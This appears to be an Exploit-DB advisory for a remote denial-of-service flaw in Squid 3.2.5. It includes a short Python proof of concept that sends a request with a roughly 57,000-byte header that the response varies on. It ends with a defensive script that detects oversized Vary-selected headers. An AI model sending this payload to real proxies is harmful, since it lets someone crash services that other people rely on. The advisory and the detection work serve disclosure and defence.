Squid – ‘httpMakeVaryMark()’ Remote Denial of Service

  • Author: tytusromekiatomek
    Date: 2013-03-05
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/38365/
  • source: https://www.securityfocus.com/bid/58319/info
    
    Squid is prone to a remote denial-of-service vulnerability.
    
    Attackers can exploit this issue to crash the application, resulting in denial-of-service conditions.
    
    Squid 3.2.5 is vulnerable; other versions may also be affected. 
    
    Request
    -- cut --
    #!/usr/bin/env python
    print 'GET /index.html HTTP/1.1'
    print 'Host: localhost'
    print 'X-HEADSHOT: ' + '%XX' * 19000
    print '\r\n\r\n'
    -- cut --
    
    Response
    -- cut --
    HTTP/1.1 200 OK
    Vary: X-HEADSHOT
    -- cut --
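
A defender-side check for the pattern in the request/response pair above, added here as an example and not taken from the advisory or from Squid: it flags a transaction when a request header named in the response's Vary carries an unusually large value. The 4096-byte threshold and all function and variable names are assumptions.

```python
# Added detection example; not code from the advisory or from Squid.
# Assumption: 4096 bytes is a reasonable ceiling for a Vary-selected header value.
MAX_VARY_VALUE_BYTES = 4096


def parse_headers(raw):
    """Return {lowercased-name: [values]} from a raw HTTP message head."""
    headers = {}
    for line in raw.replace("\r\n", "\n").split("\n")[1:]:
        if not line:
            break  # blank line ends the header block
        name, sep, value = line.partition(":")
        if sep:  # skip malformed lines without a colon
            headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers


def vary_fields(response_headers):
    """Request-header names the response's Vary header selects on."""
    names = []
    for value in response_headers.get("vary", []):
        names.extend(n.strip().lower() for n in value.split(",") if n.strip())
    return [n for n in names if n != "*"]


def oversized_vary_inputs(raw_request, raw_response, limit=MAX_VARY_VALUE_BYTES):
    """List (header, total_value_bytes) for Vary-selected request headers over limit."""
    req = parse_headers(raw_request)
    findings = []
    for name in vary_fields(parse_headers(raw_response)):
        size = sum(len(v.encode("utf-8")) for v in req.get(name, []))
        if size > limit:
            findings.append((name, size))
    return findings


# Constructed samples: the first pair mirrors the request/response shown above.
FLAGGED_REQUEST = ("GET /index.html HTTP/1.1\r\nHost: localhost\r\n"
                   "X-HEADSHOT: " + "%XX" * 19000 + "\r\n\r\n")
FLAGGED_RESPONSE = "HTTP/1.1 200 OK\r\nVary: X-HEADSHOT\r\n\r\n"
BENIGN_REQUEST = "GET / HTTP/1.1\r\nHost: localhost\r\nAccept-Encoding: gzip\r\n\r\n"
BENIGN_RESPONSE = "HTTP/1.1 200 OK\r\nVary: Accept-Encoding, User-Agent\r\n\r\n"

if __name__ == "__main__":
    print(oversized_vary_inputs(FLAGGED_REQUEST, FLAGGED_RESPONSE))
    print(oversized_vary_inputs(BENIGN_REQUEST, BENIGN_RESPONSE))
```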